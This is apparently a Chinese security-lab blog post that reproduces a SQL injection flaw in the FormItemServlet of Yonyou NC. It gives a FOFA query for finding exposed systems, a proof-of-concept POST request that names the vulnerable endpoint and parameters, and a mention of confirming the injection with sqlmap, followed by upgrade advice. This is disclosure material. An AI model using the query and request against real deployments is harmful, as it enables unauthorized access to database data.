原文链接: https://mp.weixin.qq.com/s?__biz=Mzk5MDYxODcwMA==&mid=2247483910&idx=1&sn=ddd1317a978088995b6a1ebd87b17f71

【已复现】用友NC FormItemServlet方法存在SQL注入漏洞

原创 zz 星络安全实验室 2025-07-13 17:27

免责声明:文章中涉及的漏洞均已修复，敏感信息均已做打码处理，文章仅做经验分享用途，未授权的攻击属于非法行为!文章中敏感信息均已做多层打码处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责作者不为此承担任何责任，一旦造成后果请自行负责

漏洞详情：

用友NC系统FormItemServlet方法存在SQL注入漏洞，攻击者可获取数据库敏感信息

漏洞复现：

fofa：

app="用友-UFIDA-NC"

poc：

POST /portal/pt/servlet/getFormItem/doPost?pageId=login&clazz=nc.uap.wfm.vo.base.ProDefBaseVO&proDefPk=1 HTTP/1.1

使用sqlmap验证注入：

复现成功

修复意见：

关注厂商动态，升级至安全版本